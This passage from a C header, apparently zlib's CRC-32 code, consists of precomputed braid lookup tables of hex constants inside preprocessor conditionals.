0x1fe48849, 0xdad80570, 0x99cc7e67, 0x39410714, 0x7a557c03, 0xbf69f13a, 0xfc7d8a2d, 0x3510eb49, 0x7604905e, 0xb3381d67, 0xf02c6670, 0x21e3dfaf, 0x62f7a4b8, 0xa7cb2981, 0xe4df5296, 0x2db233f2, 0x6ea648e5, 0xab9ac5dc, 0xe88ebecb, 0xeb81363a, 0xa8954d2d, 0x6da9c014, 0x2ebdbb03, 0xe7d0da67, 0xa4c4a170, 0x61f82c49, 0x22ec575e, 0xf323ee81, 0xb0379596, 0x750b18af, 0x361f63b8, 0xff7202dc, 0xbc6679cb, 0x795af4f2, 0x3a4e8fe5, 0x9ac3f696, 0xd9d78d81, 0x1ceb00b8, 0x5fff7baf, 0x96921acb, 0xd58661dc, 0x10baece5, 0x53ae97f2, 0x82612e2d, 0xc175553a, 0x0449d803, 0x475da314, 0x8e30c270, 0xcd24b967, 0x0818345e, 0x4b0c4f49}, {0x00000000, 0x3e6bc2ef, 0x3dd0f504, 0x03bb37eb, 0x7aa0eb09, 0x44cb29e6, 0x47701e0d, 0x791bdce2, 0xf440d713, 0xca2b15fc, 0xc9902217, 0xf7fbe0f8, 0x8ee03c1a, 0xb08bfef5, 0xb330c91e, 0x8d5b0bf1, 0xe881ae27, 0xd6ea6cc8, 0xd5515b23, 0xeb3a99cc, 0x9221452e, 0xac4a87c1, 0xaff1b02a, 0x919a72c5, 0x1cc17934, 0x22aabbdb, 0x21118c30, 0x1f7a4edf, 0x6661923d, 0x580a50d2, 0x5bb16739, 0x65daa5d6, 0xd0035d4f, 0xee689fa0, 0xedd3a84b, 0xd3b86aa4, 0xaaa3b646, 0x94c874a9, 0x97734342, 0xa91881ad, 0x24438a5c, 0x1a2848b3, 0x19937f58, 0x27f8bdb7, 0x5ee36155, 0x6088a3ba, 0x63339451, 0x5d5856be, 0x3882f368, 0x06e93187, 0x0552066c, 0x3b39c483, 0x42221861, 0x7c49da8e, 0x7ff2ed65, 0x41992f8a, 0xccc2247b, 0xf2a9e694, 0xf112d17f, 0xcf791390, 0xb662cf72, 0x88090d9d, 0x8bb23a76, 0xb5d9f899, 0xa007ba9e, 0x9e6c7871, 0x9dd74f9a, 0xa3bc8d75, 0xdaa75197, 0xe4cc9378, 0xe777a493, 0xd91c667c, 0x54476d8d, 0x6a2caf62, 0x69979889, 0x57fc5a66, 0x2ee78684, 0x108c446b, 0x13377380, 0x2d5cb16f, 0x488614b9, 0x76edd656, 0x7556e1bd, 0x4b3d2352, 0x3226ffb0, 0x0c4d3d5f, 0x0ff60ab4, 0x319dc85b, 0xbcc6c3aa, 0x82ad0145, 0x811636ae, 0xbf7df441, 0xc66628a3, 0xf80dea4c, 0xfbb6dda7, 0xc5dd1f48, 0x7004e7d1, 0x4e6f253e, 0x4dd412d5, 0x73bfd03a, 0x0aa40cd8, 0x34cfce37, 0x3774f9dc, 0x091f3b33, 0x844430c2, 0xba2ff22d, 0xb994c5c6, 0x87ff0729, 0xfee4dbcb, 0xc08f1924, 0xc3342ecf, 0xfd5fec20, 0x988549f6, 0xa6ee8b19, 0xa555bcf2, 
0x9b3e7e1d, 0xe225a2ff, 0xdc4e6010, 0xdff557fb, 0xe19e9514, 0x6cc59ee5, 0x52ae5c0a, 0x51156be1, 0x6f7ea90e, 0x166575ec, 0x280eb703, 0x2bb580e8, 0x15de4207, 0x010905e6, 0x3f62c709, 0x3cd9f0e2, 0x02b2320d, 0x7ba9eeef, 0x45c22c00, 0x46791beb, 0x7812d904, 0xf549d2f5, 0xcb22101a, 0xc89927f1, 0xf6f2e51e, 0x8fe939fc, 0xb182fb13, 0xb239ccf8, 0x8c520e17, 0xe988abc1, 0xd7e3692e, 0xd4585ec5, 0xea339c2a, 0x932840c8, 0xad438227, 0xaef8b5cc, 0x90937723, 0x1dc87cd2, 0x23a3be3d, 0x201889d6, 0x1e734b39, 0x676897db, 0x59035534, 0x5ab862df, 0x64d3a030, 0xd10a58a9, 0xef619a46, 0xecdaadad, 0xd2b16f42, 0xabaab3a0, 0x95c1714f, 0x967a46a4, 0xa811844b, 0x254a8fba, 0x1b214d55, 0x189a7abe, 0x26f1b851, 0x5fea64b3, 0x6181a65c, 0x623a91b7, 0x5c515358, 0x398bf68e, 0x07e03461, 0x045b038a, 0x3a30c165, 0x432b1d87, 0x7d40df68, 0x7efbe883, 0x40902a6c, 0xcdcb219d, 0xf3a0e372, 0xf01bd499, 0xce701676, 0xb76bca94, 0x8900087b, 0x8abb3f90, 0xb4d0fd7f, 0xa10ebf78, 0x9f657d97, 0x9cde4a7c, 0xa2b58893, 0xdbae5471, 0xe5c5969e, 0xe67ea175, 0xd815639a, 0x554e686b, 0x6b25aa84, 0x689e9d6f, 0x56f55f80, 0x2fee8362, 0x1185418d, 0x123e7666, 0x2c55b489, 0x498f115f, 0x77e4d3b0, 0x745fe45b, 0x4a3426b4, 0x332ffa56, 0x0d4438b9, 0x0eff0f52, 0x3094cdbd, 0xbdcfc64c, 0x83a404a3, 0x801f3348, 0xbe74f1a7, 0xc76f2d45, 0xf904efaa, 0xfabfd841, 0xc4d41aae, 0x710de237, 0x4f6620d8, 0x4cdd1733, 0x72b6d5dc, 0x0bad093e, 0x35c6cbd1, 0x367dfc3a, 0x08163ed5, 0x854d3524, 0xbb26f7cb, 0xb89dc020, 0x86f602cf, 0xffedde2d, 0xc1861cc2, 0xc23d2b29, 0xfc56e9c6, 0x998c4c10, 0xa7e78eff, 0xa45cb914, 0x9a377bfb, 0xe32ca719, 0xdd4765f6, 0xdefc521d, 0xe09790f2, 0x6dcc9b03, 0x53a759ec, 0x501c6e07, 0x6e77ace8, 0x176c700a, 0x2907b2e5, 0x2abc850e, 0x14d747e1}, {0x00000000, 0xc0df8ec1, 0xc1b96c58, 0x0166e299, 0x8273d9b0, 0x42ac5771, 0x43cab5e8, 0x83153b29, 0x45e1c3ba, 0x853e4d7b, 0x8458afe2, 0x44872123, 0xc7921a0a, 0x074d94cb, 0x062b7652, 0xc6f4f893, 0xcbc4f6ae, 0x0b1b786f, 0x0a7d9af6, 0xcaa21437, 0x49b72f1e, 0x8968a1df, 0x880e4346, 0x48d1cd87, 0x8e253514, 
0x4efabbd5, 0x4f9c594c, 0x8f43d78d, 0x0c56eca4, 0xcc896265, 0xcdef80fc, 0x0d300e3d, 0xd78f9c86, 0x17501247, 0x1636f0de, 0xd6e97e1f, 0x55fc4536, 0x9523cbf7, 0x9445296e, 0x549aa7af, 0x926e5f3c, 0x52b1d1fd, 0x53d73364, 0x9308bda5, 0x101d868c, 0xd0c2084d, 0xd1a4ead4, 0x117b6415, 0x1c4b6a28, 0xdc94e4e9, 0xddf20670, 0x1d2d88b1, 0x9e38b398, 0x5ee73d59, 0x5f81dfc0, 0x9f5e5101, 0x59aaa992, 0x99752753, 0x9813c5ca, 0x58cc4b0b, 0xdbd97022, 0x1b06fee3, 0x1a601c7a, 0xdabf92bb, 0xef1948d6, 0x2fc6c617, 0x2ea0248e, 0xee7faa4f, 0x6d6a9166, 0xadb51fa7, 0xacd3fd3e, 0x6c0c73ff, 0xaaf88b6c, 0x6a2705ad, 0x6b41e734, 0xab9e69f5, 0x288b52dc, 0xe854dc1d, 0xe9323e84, 0x29edb045, 0x24ddbe78, 0xe40230b9, 0xe564d220, 0x25bb5ce1, 0xa6ae67c8, 0x6671e909, 0x67170b90, 0xa7c88551, 0x613c7dc2, 0xa1e3f303, 0xa085119a, 0x605a9f5b, 0xe34fa472, 0x23902ab3, 0x22f6c82a, 0xe22946eb, 0x3896d450, 0xf8495a91, 0xf92fb808, 0x39f036c9, 0xbae50de0, 0x7a3a8321, 0x7b5c61b8, 0xbb83ef79, 0x7d7717ea, 0xbda8992b, 0xbcce7bb2, 0x7c11f573, 0xff04ce5a, 0x3fdb409b, 0x3ebda202, 0xfe622cc3, 0xf35222fe, 0x338dac3f, 0x32eb4ea6, 0xf234c067, 0x7121fb4e, 0xb1fe758f, 0xb0989716, 0x704719d7, 0xb6b3e144, 0x766c6f85, 0x770a8d1c, 0xb7d503dd, 0x34c038f4, 0xf41fb635, 0xf57954ac, 0x35a6da6d, 0x9f35e177, 0x5fea6fb6, 0x5e8c8d2f, 0x9e5303ee, 0x1d4638c7, 0xdd99b606, 0xdcff549f, 0x1c20da5e, 0xdad422cd, 0x1a0bac0c, 0x1b6d4e95, 0xdbb2c054, 0x58a7fb7d, 0x987875bc, 0x991e9725, 0x59c119e4, 0x54f117d9, 0x942e9918, 0x95487b81, 0x5597f540, 0xd682ce69, 0x165d40a8, 0x173ba231, 0xd7e42cf0, 0x1110d463, 0xd1cf5aa2, 0xd0a9b83b, 0x107636fa, 0x93630dd3, 0x53bc8312, 0x52da618b, 0x9205ef4a, 0x48ba7df1, 0x8865f330, 0x890311a9, 0x49dc9f68, 0xcac9a441, 0x0a162a80, 0x0b70c819, 0xcbaf46d8, 0x0d5bbe4b, 0xcd84308a, 0xcce2d213, 0x0c3d5cd2, 0x8f2867fb, 0x4ff7e93a, 0x4e910ba3, 0x8e4e8562, 0x837e8b5f, 0x43a1059e, 0x42c7e707, 0x821869c6, 0x010d52ef, 0xc1d2dc2e, 0xc0b43eb7, 0x006bb076, 0xc69f48e5, 0x0640c624, 0x072624bd, 0xc7f9aa7c, 0x44ec9155, 0x84331f94, 0x8555fd0d, 
0x458a73cc, 0x702ca9a1, 0xb0f32760, 0xb195c5f9, 0x714a4b38, 0xf25f7011, 0x3280fed0, 0x33e61c49, 0xf3399288, 0x35cd6a1b, 0xf512e4da, 0xf4740643, 0x34ab8882, 0xb7beb3ab, 0x77613d6a, 0x7607dff3, 0xb6d85132, 0xbbe85f0f, 0x7b37d1ce, 0x7a513357, 0xba8ebd96, 0x399b86bf, 0xf944087e, 0xf822eae7, 0x38fd6426, 0xfe099cb5, 0x3ed61274, 0x3fb0f0ed, 0xff6f7e2c, 0x7c7a4505, 0xbca5cbc4, 0xbdc3295d, 0x7d1ca79c, 0xa7a33527, 0x677cbbe6, 0x661a597f, 0xa6c5d7be, 0x25d0ec97, 0xe50f6256, 0xe46980cf, 0x24b60e0e, 0xe242f69d, 0x229d785c, 0x23fb9ac5, 0xe3241404, 0x60312f2d, 0xa0eea1ec, 0xa1884375, 0x6157cdb4, 0x6c67c389, 0xacb84d48, 0xaddeafd1, 0x6d012110, 0xee141a39, 0x2ecb94f8, 0x2fad7661, 0xef72f8a0, 0x29860033, 0xe9598ef2, 0xe83f6c6b, 0x28e0e2aa, 0xabf5d983, 0x6b2a5742, 0x6a4cb5db, 0xaa933b1a}, {0x00000000, 0x6f4ca59b, 0x9f9e3bec, 0xf0d29e77, 0x7f3b0603, 0x1077a398, 0xe0a53def, 0x8fe99874, 0xfe760c06, 0x913aa99d, 0x61e837ea, 0x0ea49271, 0x814d0a05, 0xee01af9e, 0x1ed331e9, 0x719f9472, 0xfced180c, 0x93a1bd97, 0x637323e0, 0x0c3f867b, 0x83d61e0f, 0xec9abb94, 0x1c4825e3, 0x73048078, 0x029b140a, 0x6dd7b191, 0x9d052fe6, 0xf2498a7d, 0x7da01209, 0x12ecb792, 0xe23e29e5, 0x8d728c7e, 0xf8db3118, 0x97979483, 0x67450af4, 0x0809af6f, 0x87e0371b, 0xe8ac9280, 0x187e0cf7, 0x7732a96c, 0x06ad3d1e, 0x69e19885, 0x993306f2, 0xf67fa369, 0x79963b1d, 0x16da9e86, 0xe60800f1, 0x8944a56a, 0x04362914, 0x6b7a8c8f, 0x9ba812f8, 0xf4e4b763, 0x7b0d2f17, 0x14418a8c, 0xe49314fb, 0x8bdfb160, 0xfa402512, 0x950c8089, 0x65de1efe, 0x0a92bb65, 0x857b2311, 0xea37868a, 0x1ae518fd, 0x75a9bd66, 0xf0b76330, 0x9ffbc6ab, 0x6f2958dc, 0x0065fd47, 0x8f8c6533, 0xe0c0c0a8, 0x10125edf, 0x7f5efb44, 0x0ec16f36, 0x618dcaad, 0x915f54da, 0xfe13f141, 0x71fa6935, 0x1eb6ccae, 0xee6452d9, 0x8128f742, 0x0c5a7b3c, 0x6316dea7, 0x93c440d0, 0xfc88e54b, 0x73617d3f, 0x1c2dd8a4, 0xecff46d3, 0x83b3e348, 0xf22c773a, 0x9d60d2a1, 0x6db24cd6, 0x02fee94d, 0x8d177139, 0xe25bd4a2, 0x12894ad5, 0x7dc5ef4e, 0x086c5228, 0x6720f7b3, 0x97f269c4, 0xf8becc5f, 0x7757542b, 
0x181bf1b0, 0xe8c96fc7, 0x8785ca5c, 0xf61a5e2e, 0x9956fbb5, 0x698465c2, 0x06c8c059, 0x8921582d, 0xe66dfdb6, 0x16bf63c1, 0x79f3c65a, 0xf4814a24, 0x9bcdefbf, 0x6b1f71c8, 0x0453d453, 0x8bba4c27, 0xe4f6e9bc, 0x142477cb, 0x7b68d250, 0x0af74622, 0x65bbe3b9, 0x95697dce, 0xfa25d855, 0x75cc4021, 0x1a80e5ba, 0xea527bcd, 0x851ede56, 0xe06fc760, 0x8f2362fb, 0x7ff1fc8c, 0x10bd5917, 0x9f54c163, 0xf01864f8, 0x00cafa8f, 0x6f865f14, 0x1e19cb66, 0x71556efd, 0x8187f08a, 0xeecb5511, 0x6122cd65, 0x0e6e68fe, 0xfebcf689, 0x91f05312, 0x1c82df6c, 0x73ce7af7, 0x831ce480, 0xec50411b, 0x63b9d96f, 0x0cf57cf4, 0xfc27e283, 0x936b4718, 0xe2f4d36a, 0x8db876f1, 0x7d6ae886, 0x12264d1d, 0x9dcfd569, 0xf28370f2, 0x0251ee85, 0x6d1d4b1e, 0x18b4f678, 0x77f853e3, 0x872acd94, 0xe866680f, 0x678ff07b, 0x08c355e0, 0xf811cb97, 0x975d6e0c, 0xe6c2fa7e, 0x898e5fe5, 0x795cc192, 0x16106409, 0x99f9fc7d, 0xf6b559e6, 0x0667c791, 0x692b620a, 0xe459ee74, 0x8b154bef, 0x7bc7d598, 0x148b7003, 0x9b62e877, 0xf42e4dec, 0x04fcd39b, 0x6bb07600, 0x1a2fe272, 0x756347e9, 0x85b1d99e, 0xeafd7c05, 0x6514e471, 0x0a5841ea, 0xfa8adf9d, 0x95c67a06, 0x10d8a450, 0x7f9401cb, 0x8f469fbc, 0xe00a3a27, 0x6fe3a253, 0x00af07c8, 0xf07d99bf, 0x9f313c24, 0xeeaea856, 0x81e20dcd, 0x713093ba, 0x1e7c3621, 0x9195ae55, 0xfed90bce, 0x0e0b95b9, 0x61473022, 0xec35bc5c, 0x837919c7, 0x73ab87b0, 0x1ce7222b, 0x930eba5f, 0xfc421fc4, 0x0c9081b3, 0x63dc2428, 0x1243b05a, 0x7d0f15c1, 0x8ddd8bb6, 0xe2912e2d, 0x6d78b659, 0x023413c2, 0xf2e68db5, 0x9daa282e, 0xe8039548, 0x874f30d3, 0x779daea4, 0x18d10b3f, 0x9738934b, 0xf87436d0, 0x08a6a8a7, 0x67ea0d3c, 0x1675994e, 0x79393cd5, 0x89eba2a2, 0xe6a70739, 0x694e9f4d, 0x06023ad6, 0xf6d0a4a1, 0x999c013a, 0x14ee8d44, 0x7ba228df, 0x8b70b6a8, 0xe43c1333, 0x6bd58b47, 0x04992edc, 0xf44bb0ab, 0x9b071530, 0xea988142, 0x85d424d9, 0x7506baae, 0x1a4a1f35, 0x95a38741, 0xfaef22da, 0x0a3dbcad, 0x65711936}}; #endif #endif #if N == 4 #if W == 8 local const z_crc_t FAR crc_braid_table[][256] = { {0x00000000, 0xf1da05aa, 0x38c50d15, 0xc91f08bf, 
0x718a1a2a, 0x80501f80, 0x494f173f, 0xb8951295, 0xe3143454, 0x12ce31fe, 0xdbd13941, 0x2a0b3ceb, 0x929e2e7e, 0x63442bd4, 0xaa5b236b, 0x5b8126c1, 0x1d596ee9, 0xec836b43, 0x259c63fc, 0xd4466656, 0x6cd374c3, 0x9d097169, 0x541679d6, 0xa5cc7c7c, 0xfe4d5abd, 0x0f975f17, 0xc68857a8, 0x37525202, 0x8fc74097, 0x7e1d453d, 0xb7024d82, 0x46d84828, 0x3ab2ddd2, 0xcb68d878, 0x0277d0c7, 0xf3add56d, 0x4b38c7f8, 0xbae2c252, 0x73fdcaed, 0x8227cf47, 0xd9a6e986, 0x287cec2c, 0xe163e493, 0x10b9e139, 0xa82cf3ac, 0x59f6f606, 0x90e9feb9, 0x6133fb13, 0x27ebb33b, 0xd631b691, 0x1f2ebe2e, 0xeef4bb84, 0x5661a911, 0xa7bbacbb, 0x6ea4a404, 0x9f7ea1ae, 0xc4ff876f, 0x352582c5, 0xfc3a8a7a, 0x0de08fd0, 0xb5759d45, 0x44af98ef, 0x8db09050, 0x7c6a95fa, 0x7565bba4, 0x84bfbe0e, 0x4da0b6b1, 0xbc7ab31b, 0x04efa18e, 0xf535a424, 0x3c2aac9b, 0xcdf0a931, 0x96718ff0, 0x67ab8a5a, 0xaeb482e5, 0x5f6e874f, 0xe7fb95da, 0x16219070, 0xdf3e98cf, 0x2ee49d65, 0x683cd54d, 0x99e6d0e7, 0x50f9d858, 0xa123ddf2, 0x19b6cf67, 0xe86ccacd, 0x2173c272, 0xd0a9c7d8, 0x8b28e119, 0x7af2e4b3, 0xb3edec0c, 0x4237e9a6, 0xfaa2fb33, 0x0b78fe99, 0xc267f626, 0x33bdf38c, 0x4fd76676, 0xbe0d63dc, 0x77126b63, 0x86c86ec9, 0x3e5d7c5c, 0xcf8779f6, 0x06987149, 0xf74274e3, 0xacc35222, 0x5d195788, 0x94065f37, 0x65dc5a9d, 0xdd494808, 0x2c934da2, 0xe58c451d, 0x145640b7, 0x528e089f, 0xa3540d35, 0x6a4b058a, 0x9b910020, 0x230412b5, 0xd2de171f, 0x1bc11fa0, 0xea1b1a0a, 0xb19a3ccb, 0x40403961, 0x895f31de, 0x78853474, 0xc01026e1, 0x31ca234b, 0xf8d52bf4, 0x090f2e5e, 0xeacb7748, 0x1b1172e2, 0xd20e7a5d, 0x23d47ff7, 0x9b416d62, 0x6a9b68c8, 0xa3846077, 0x525e65dd, 0x09df431c, 0xf80546b6, 0x311a4e09, 0xc0c04ba3, 0x78555936, 0x898f5c9c, 0x40905423, 0xb14a5189, 0xf79219a1, 0x06481c0b, 0xcf5714b4, 0x3e8d111e, 0x8618038b, 0x77c20621, 0xbedd0e9e, 0x4f070b34, 0x14862df5, 0xe55c285f, 0x2c4320e0, 0xdd99254a, 0x650c37df, 0x94d63275, 0x5dc93aca, 0xac133f60, 0xd079aa9a, 0x21a3af30, 0xe8bca78f, 0x1966a225, 0xa1f3b0b0, 0x5029b51a, 0x9936bda5, 0x68ecb80f, 0x336d9ece, 0xc2b79b64, 
0x0ba893db, 0xfa729671, 0x42e784e4, 0xb33d814e, 0x7a2289f1, 0x8bf88c5b, 0xcd20c473, 0x3cfac1d9, 0xf5e5c966, 0x043fcccc, 0xbcaade59, 0x4d70dbf3, 0x846fd34c, 0x75b5d6e6, 0x2e34f027, 0xdfeef58d, 0x16f1fd32, 0xe72bf898, 0x5fbeea0d, 0xae64efa7, 0x677be718, 0x96a1e2b2, 0x9faeccec, 0x6e74c946, 0xa76bc1f9, 0x56b1c453, 0xee24d6c6, 0x1ffed36c, 0xd6e1dbd3, 0x273bde79, 0x7cbaf8b8, 0x8d60fd12, 0x447ff5ad, 0xb5a5f007, 0x0d30e292, 0xfceae738, 0x35f5ef87, 0xc42fea2d, 0x82f7a205, 0x732da7af, 0xba32af10, 0x4be8aaba, 0xf37db82f, 0x02a7bd85, 0xcbb8b53a, 0x3a62b090, 0x61e39651, 0x903993fb, 0x59269b44, 0xa8fc9eee, 0x10698c7b, 0xe1b389d1, 0x28ac816e, 0xd97684c4, 0xa51c113e, 0x54c61494, 0x9dd91c2b, 0x6c031981, 0xd4960b14, 0x254c0ebe, 0xec530601, 0x1d8903ab, 0x4608256a, 0xb7d220c0, 0x7ecd287f, 0x8f172dd5, 0x37823f40, 0xc6583aea, 0x0f473255, 0xfe9d37ff, 0xb8457fd7, 0x499f7a7d, 0x808072c2, 0x715a7768, 0xc9cf65fd, 0x38156057, 0xf10a68e8, 0x00d06d42, 0x5b514b83, 0xaa8b4e29, 0x63944696, 0x924e433c, 0x2adb51a9, 0xdb015403, 0x121e5cbc, 0xe3c45916}, {0x00000000, 0x0ee7e8d1, 0x1dcfd1a2, 0x13283973, 0x3b9fa344, 0x35784b95, 0x265072e6, 0x28b79a37, 0x773f4688, 0x79d8ae59, 0x6af0972a, 0x64177ffb, 0x4ca0e5cc, 0x42470d1d, 0x516f346e, 0x5f88dcbf, 0xee7e8d10, 0xe09965c1, 0xf3b15cb2, 0xfd56b463, 0xd5e12e54, 0xdb06c685, 0xc82efff6, 0xc6c91727, 0x9941cb98, 0x97a62349, 0x848e1a3a, 0x8a69f2eb, 0xa2de68dc, 0xac39800d, 0xbf11b97e, 0xb1f651af, 0x078c1c61, 0x096bf4b0, 0x1a43cdc3, 0x14a42512, 0x3c13bf25, 0x32f457f4, 0x21dc6e87, 0x2f3b8656, 0x70b35ae9, 0x7e54b238, 0x6d7c8b4b, 0x639b639a, 0x4b2cf9ad, 0x45cb117c, 0x56e3280f, 0x5804c0de, 0xe9f29171, 0xe71579a0, 0xf43d40d3, 0xfadaa802, 0xd26d3235, 0xdc8adae4, 0xcfa2e397, 0xc1450b46, 0x9ecdd7f9, 0x902a3f28, 0x8302065b, 0x8de5ee8a, 0xa55274bd, 0xabb59c6c, 0xb89da51f, 0xb67a4dce, 0x0f1838c2, 0x01ffd013, 0x12d7e960, 0x1c3001b1, 0x34879b86, 0x3a607357, 0x29484a24, 0x27afa2f5, 0x78277e4a, 0x76c0969b, 0x65e8afe8, 0x6b0f4739, 0x43b8dd0e, 0x4d5f35df, 0x5e770cac, 0x5090e47d, 
0xe166b5d2, 0xef815d03, 0xfca96470, 0xf24e8ca1, 0xdaf91696, 0xd41efe47, 0xc736c734, 0xc9d12fe5, 0x9659f35a, 0x98be1b8b, 0x8b9622f8, 0x8571ca29, 0xadc6501e, 0xa321b8cf, 0xb00981bc, 0xbeee696d, 0x089424a3, 0x0673cc72, 0x155bf501, 0x1bbc1dd0, 0x330b87e7, 0x3dec6f36, 0x2ec45645, 0x2023be94, 0x7fab622b, 0x714c8afa, 0x6264b389, 0x6c835b58, 0x4434c16f, 0x4ad329be, 0x59fb10cd, 0x571cf81c, 0xe6eaa9b3, 0xe80d4162, 0xfb257811, 0xf5c290c0, 0xdd750af7, 0xd392e226, 0xc0badb55, 0xce5d3384, 0x91d5ef3b, 0x9f3207ea, 0x8c1a3e99, 0x82fdd648, 0xaa4a4c7f, 0xa4ada4ae, 0xb7859ddd, 0xb962750c, 0x1e307184, 0x10d79955, 0x03ffa026, 0x0d1848f7, 0x25afd2c0, 0x2b483a11, 0x38600362, 0x3687ebb3, 0x690f370c, 0x67e8dfdd, 0x74c0e6ae, 0x7a270e7f, 0x52909448, 0x5c777c99, 0x4f5f45ea, 0x41b8ad3b, 0xf04efc94, 0xfea91445, 0xed812d36, 0xe366c5e7, 0xcbd15fd0, 0xc536b701, 0xd61e8e72, 0xd8f966a3, 0x8771ba1c, 0x899652cd, 0x9abe6bbe, 0x9459836f, 0xbcee1958, 0xb209f189, 0xa121c8fa, 0xafc6202b, 0x19bc6de5, 0x175b8534, 0x0473bc47, 0x0a945496, 0x2223cea1, 0x2cc42670, 0x3fec1f03, 0x310bf7d2, 0x6e832b6d, 0x6064c3bc, 0x734cfacf, 0x7dab121e, 0x551c8829, 0x5bfb60f8, 0x48d3598b, 0x4634b15a, 0xf7c2e0f5, 0xf9250824, 0xea0d3157, 0xe4ead986, 0xcc5d43b1, 0xc2baab60, 0xd1929213, 0xdf757ac2, 0x80fda67d, 0x8e1a4eac, 0x9d3277df, 0x93d59f0e, 0xbb620539, 0xb585ede8, 0xa6add49b, 0xa84a3c4a, 0x11284946, 0x1fcfa197, 0x0ce798e4, 0x02007035, 0x2ab7ea02, 0x245002d3, 0x37783ba0, 0x399fd371, 0x66170fce, 0x68f0e71f, 0x7bd8de6c, 0x753f36bd, 0x5d88ac8a, 0x536f445b, 0x40477d28, 0x4ea095f9, 0xff56c456, 0xf1b12c87, 0xe29915f4, 0xec7efd25, 0xc4c96712, 0xca2e8fc3, 0xd906b6b0, 0xd7e15e61, 0x886982de, 0x868e6a0f, 0x95a6537c, 0x9b41bbad, 0xb3f6219a, 0xbd11c94b, 0xae39f038, 0xa0de18e9, 0x16a45527, 0x1843bdf6, 0x0b6b8485, 0x058c6c54, 0x2d3bf663, 0x23dc1eb2, 0x30f427c1, 0x3e13cf10, 0x619b13af, 0x6f7cfb7e, 0x7c54c20d, 0x72b32adc, 0x5a04b0eb, 0x54e3583a, 0x47cb6149, 0x492c8998, 0xf8dad837, 0xf63d30e6, 0xe5150995, 0xebf2e144, 0xc3457b73, 0xcda293a2, 
0xde8aaad1, 0xd06d4200, 0x8fe59ebf, 0x8102766e, 0x922a4f1d, 0x9ccda7cc, 0xb47a3dfb, 0xba9dd52a, 0xa9b5ec59, 0xa7520488}, {0x00000000, 0x3c60e308, 0x78c1c610, 0x44a12518, 0xf1838c20, 0xcde36f28, 0x89424a30, 0xb522a938, 0x38761e01, 0x0416fd09, 0x40b7d811, 0x7cd73b19, 0xc9f59221, 0xf5957129, 0xb1345431, 0x8d54b739, 0x70ec3c02, 0x4c8cdf0a, 0x082dfa12, 0x344d191a, 0x816fb022, 0xbd0f532a, 0xf9ae7632, 0xc5ce953a, 0x489a2203, 0x74fac10b, 0x305be413, 0x0c3b071b, 0xb919ae23, 0x85794d2b, 0xc1d86833, 0xfdb88b3b, 0xe1d87804, 0xddb89b0c, 0x9919be14, 0xa5795d1c, 0x105bf424, 0x2c3b172c, 0x689a3234, 0x54fad13c, 0xd9ae6605, 0xe5ce850d, 0xa16fa015, 0x9d0f431d, 0x282dea25, 0x144d092d, 0x50ec2c35, 0x6c8ccf3d, 0x91344406, 0xad54a70e, 0xe9f58216, 0xd595611e, 0x60b7c826, 0x5cd72b2e, 0x18760e36, 0x2416ed3e, 0xa9425a07, 0x9522b90f, 0xd1839c17, 0xede37f1f, 0x58c1d627, 0x64a1352f, 0x20001037, 0x1c60f33f, 0x18c1f649, 0x24a11541, 0x60003059, 0x5c60d351, 0xe9427a69, 0xd5229961, 0x9183bc79, 0xade35f71, 0x20b7e848, 0x1cd70b40, 0x58762e58, 0x6416cd50, 0xd1346468, 0xed548760, 0xa9f5a278, 0x95954170, 0x682dca4b, 0x544d2943, 0x10ec0c5b, 0x2c8cef53, 0x99ae466b, 0xa5cea563, 0xe16f807b, 0xdd0f6373, 0x505bd44a, 0x6c3b3742, 0x289a125a, 0x14faf152, 0xa1d8586a, 0x9db8bb62, 0xd9199e7a, 0xe5797d72, 0xf9198e4d, 0xc5796d45, 0x81d8485d, 0xbdb8ab55, 0x089a026d, 0x34fae165, 0x705bc47d, 0x4c3b2775, 0xc16f904c, 0xfd0f7344, 0xb9ae565c, 0x85ceb554, 0x30ec1c6c, 0x0c8cff64, 0x482dda7c, 0x744d3974, 0x89f5b24f, 0xb5955147, 0xf134745f, 0xcd549757, 0x78763e6f, 0x4416dd67, 0x00b7f87f, 0x3cd71b77, 0xb183ac4e, 0x8de34f46, 0xc9426a5e, 0xf5228956, 0x4000206e, 0x7c60c366, 0x38c1e67e, 0x04a10576, 0x3183ec92, 0x0de30f9a, 0x49422a82, 0x7522c98a, 0xc00060b2, 0xfc6083ba, 0xb8c1a6a2, 0x84a145aa, 0x09f5f293, 0x3595119b, 0x71343483, 0x4d54d78b, 0xf8767eb3, 0xc4169dbb, 0x80b7b8a3, 0xbcd75bab, 0x416fd090, 0x7d0f3398, 0x39ae1680, 0x05cef588, 0xb0ec5cb0, 0x8c8cbfb8, 0xc82d9aa0, 0xf44d79a8, 0x7919ce91, 0x45792d99, 0x01d80881, 0x3db8eb89, 
0x889a42b1, 0xb4faa1b9, 0xf05b84a1, 0xcc3b67a9, 0xd05b9496, 0xec3b779e, 0xa89a5286, 0x94fab18e, 0x21d818b6, 0x1db8fbbe, 0x5919dea6, 0x65793dae, 0xe82d8a97, 0xd44d699f, 0x90ec4c87, 0xac8caf8f, 0x19ae06b7, 0x25cee5bf, 0x616fc0a7, 0x5d0f23af, 0xa0b7a894, 0x9cd74b9c, 0xd8766e84, 0xe4168d8c, 0x513424b4, 0x6d54c7bc, 0x29f5e2a4, 0x159501ac, 0x98c1b695, 0xa4a1559d, 0xe0007085, 0xdc60938d, 0x69423ab5, 0x5522d9bd, 0x1183fca5, 0x2de31fad, 0x29421adb, 0x1522f9d3, 0x5183dccb, 0x6de33fc3, 0xd8c196fb, 0xe4a175f3, 0xa00050eb, 0x9c60b3e3, 0x113404da, 0x2d54e7d2, 0x69f5c2ca, 0x559521c2, 0xe0b788fa, 0xdcd76bf2, 0x98764eea, 0xa416ade2, 0x59ae26d9, 0x65cec5d1, 0x216fe0c9, 0x1d0f03c1, 0xa82daaf9, 0x944d49f1, 0xd0ec6ce9, 0xec8c8fe1, 0x61d838d8, 0x5db8dbd0, 0x1919fec8, 0x25791dc0, 0x905bb4f8, 0xac3b57f0, 0xe89a72e8, 0xd4fa91e0, 0xc89a62df, 0xf4fa81d7, 0xb05ba4cf, 0x8c3b47c7, 0x3919eeff, 0x05790df7, 0x41d828ef, 0x7db8cbe7, 0xf0ec7cde, 0xcc8c9fd6, 0x882dbace, 0xb44d59c6, 0x016ff0fe, 0x3d0f13f6, 0x79ae36ee, 0x45ced5e6, 0xb8765edd, 0x8416bdd5, 0xc0b798cd, 0xfcd77bc5, 0x49f5d2fd, 0x759531f5, 0x313414ed, 0x0d54f7e5, 0x800040dc, 0xbc60a3d4, 0xf8c186cc, 0xc4a165c4, 0x7183ccfc, 0x4de32ff4, 0x09420aec, 0x3522e9e4}, {0x00000000, 0x6307d924, 